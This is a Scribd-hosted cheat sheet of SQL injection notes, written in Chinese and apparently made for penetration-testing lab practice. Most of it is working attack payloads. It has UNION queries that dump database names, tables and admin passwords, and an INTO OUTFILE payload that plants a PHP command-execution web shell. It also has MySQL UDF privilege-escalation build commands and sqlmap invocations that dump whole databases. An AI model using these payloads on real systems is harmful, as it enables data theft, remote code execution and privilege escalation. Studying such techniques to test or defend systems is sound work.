Scribd Logo
Upload

Welcome to Scribd!

  • MYSQL

    Uploaded by

    李竞秋
    4 views3 pages
    This document discusses various SQL injection techniques including exploiting MySQL GROUP_CONCAT() and CONCAT() functions, accessing information from the INFORMATION_SCHEMA database to retrieve database, table, and column names, executing commands by writing output to files, exploiting SQL injection in different SQL databases like SQLite3 and MySQL, and using the automated SQL injection tool sqlmap for detecting and exploiting SQL injection vulnerabilities.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document discusses various SQL injection techniques including exploiting MySQL GROUP_CONCAT() and CONCAT() functions, accessing information from the INFORMATION_SCHEMA database to retrieve database, table, and column names, executing commands by writing output to files, exploiting SQL injection in different SQL databases like SQLite3 and MySQL, and using the automated SQL injection tool sqlmap for detecting and exploiting SQL injection vulnerabilities.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    4 views3 pages

    MYSQL

    Uploaded by

    李竞秋
    This document discusses various SQL injection techniques including exploiting MySQL GROUP_CONCAT() and CONCAT() functions, accessing information from the INFORMATION_SCHEMA database to retrieve database, table, and column names, executing commands by writing output to files, exploiting SQL injection in different SQL databases like SQLite3 and MySQL, and using the automated SQL injection tool sqlmap for detecting and exploiting SQL injection vulnerabilities.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 3

    group_concat concat

    sql注⼊
    sqli-lab
    Less 1
    Sqlite3
    mysql privilege escalation
    sqlmap

    group_concat concat 
    MySQL GROUP_CONCAT()函数将组中的字符串连接成为具有各种选项的单个字符串。
    group_concat及concat⽤法

    sql注⼊ 
    SHOW Grants;
    show variables;

    暴库:(information_schema,ctftraining,mysql,performance_schema,test,news)
    ?id=-1 UNION SELECT 1,group_concat(schema_name) from
    information_schema.schemata

    暴表:(admin,contents)
    ?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables
    where table_schema="news"

    暴字段:(id,username,password)
    ?id=-1 UNION SELECT 1,group_concat(column_name) from
    information_schema.columns where table_name="admin"

    暴密码:
    ?id=-1 UNION SELECT 1,concat(username,0x3a,password SEPARATOR '<br>') from
    admin --+

    SEPARATOR '<br>' 换⾏分割

    SQL添加命令执⾏
    ' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE
    'C:/xampp/htdocs/command.php' -- -'
    sqli-lab 

    sql注⼊详细说明

    Less 1 
    输⼊?id=1
    确定可注⼊,及语句闭合位单引号
    ' OR 1=1-- -
    id=1' and '1'='1
    id=1' and '1'='2
    查字段数: id=0' order by 3 --

    Sqlite3 
    sqlite3 <database-name>
    查看表:
    .tables
    查看表列:
    PRAGMA table_info(customers);
    SELECT * FROM customers

    mysql privilege escalation 


    raptor
    privilege-escalation-with-mysql-user-defined-functions
    show variables like '%plugin%';
    show variables like '%secure_file_priv%';
    gcc -g -c raptor_udf2.c #compile the exploit code
    gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    #create the shared library (so)

    sqlmap 
    sqlmap -u "http://10.11.1.251/wp/wp-content/plugins/wp-
    autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --risk
    3 --level 5 -p wpas_keys --tamper space2comment --dump-all
    sqlmap -u http://10.11.1.252:8000/index.php --method POST --data
    "username=111&password=111&submit=Log+In" -p username --not-string="Warning" --
    dbms=MySQL --technique=TB --current-db

    爆破所有
    sqlmap -u http://10.11.1.229/ --method POST --data
    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=l5vcPcJJzaGfzbhtZ7p%2BNf588f5oMX
    4PDcBef0czH0HrvIngZvck4L1DYfrfegpG%2Buk%2BvRuaRoVSM7KpSYNA6w7TOF6%2Fhy0xgXCdi
    DreiJxHKh38xyerlnewzSjpwNPtKCNWfZJCZv8Pj%2BntaqAv7Yx%2Byqpsup9Tcy4skmhG84I%3D
    &__VIEWSTATEGENERATOR=A9B807B2&__EVENTVALIDATION=hT%2FFpZW38dvYomvpIzbtE2spgt
    yuFBbjpmKa2Tx23%2BMIkY1B01B2N9HvYdHKqyOA7fhqZ2WLtEJbuByvwx0FRZRMHpik3e%2BpTuF
    q8TfPC7Y%2F6dImG2QeY7wH9HbJgugU4HfkoiEAZPx4oaBcChxCw%2BPKPaxKKDd%2B1qjr92LcV8
    A%3D&ctl00%24MainContent%24UsernameBox=11&ctl00%24MainContent%24emailBox=11%4
    011.com&ctl00%24MainContent%24submit=Submit" -p xxxx --dbms=mssql --batch --
    dump-all --threads 5 --technique=EB

    You might also like